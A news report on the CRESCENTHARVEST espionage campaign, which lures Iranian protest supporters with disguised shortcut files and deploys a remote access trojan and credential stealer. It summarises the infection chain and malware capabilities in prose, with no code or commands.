Cybersecurity researchers have disclosed details of a new campaign dubbed CRESCENTHARVEST that is believed to target supporters of ongoing protests in Iran for information theft and long term surveillance. The activity was observed after January 9 by Acronis Threat Research Unit, which said the attacks are designed to deploy a remote access trojan and information stealer capable of executing commands, logging keystrokes, and exfiltrating sensitive data. It remains unclear whether the campaign has successfully compromised intended targets, but researchers assess that the operation aligns with broader patterns of suspected Iran aligned cyber espionage.
According to Acronis researchers Subhajeet Singha, Eliad Kimhy, and Darrel Virtusio, the campaign exploits recent geopolitical developments to lure victims into opening malicious Windows shortcut files disguised as protest related images or videos. The .LNK files are bundled within a RAR archive that also contains authentic media and a Farsi language report describing updates from what it calls rebellious cities of Iran. This framing appears designed to build credibility among Farsi speaking individuals seeking information about the protests. Once executed, the deceptive file launches PowerShell code to retrieve an additional ZIP archive while simultaneously opening a benign image or video to avoid suspicion. The infection chain relies on DLL side loading through a legitimate Google signed binary named software_reporter_tool.exe, a component of Chrome cleanup utility, which loads rogue libraries to activate the malicious functionality.
The two primary malicious components identified include urtcbased140d_d.dll, a C++ implant that extracts and decrypts Chrome app bound encryption keys through COM interfaces, and version.dll, referred to as CRESCENTHARVEST, which functions as the remote access tool. The malware is capable of enumerating installed antivirus products, listing local user accounts, harvesting system metadata, stealing browser credentials, cookies, Telegram desktop session data, and recording keystrokes. Communication with its command and control server servicelog information.com is handled via Windows Win HTTP APIs, allowing traffic to blend with normal network activity. Supported commands enable directory listing, file uploads, execution of shell commands, activation of keylogging, and collection of browser history and system information. Researchers noted that the techniques observed reflect established tradecraft, including LNK based initial access, credential harvesting, and event driven social engineering.
Although unattributed, the campaign is considered likely linked to an Iran aligned threat actor. It follows a previous operation documented by HarfangLab, which described a cluster called RedKitten targeting non governmental organizations and individuals documenting human rights abuses in Iran using a backdoor known as SloppyMIO. Acronis stated that Iranian groups such as Charming Kitten and Tortoiseshell have historically employed prolonged social engineering tactics, cultivating relationships with targets over extended periods before delivering malware. The disclosure also comes amid reports that authorities in Iran have tracked protester locations via mobile phones and sent warning messages referencing intelligence monitoring. Digital rights group Holistic Resilience has reported SIM card suspensions affecting individuals posting about protests online. Researchers assess that such cyber operations form part of a broader digital control framework supported by evolving infrastructure such as National Information Network and malware tools including 2Ac2 RAT, enabling sustained remote access and monitoring of targeted individuals.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
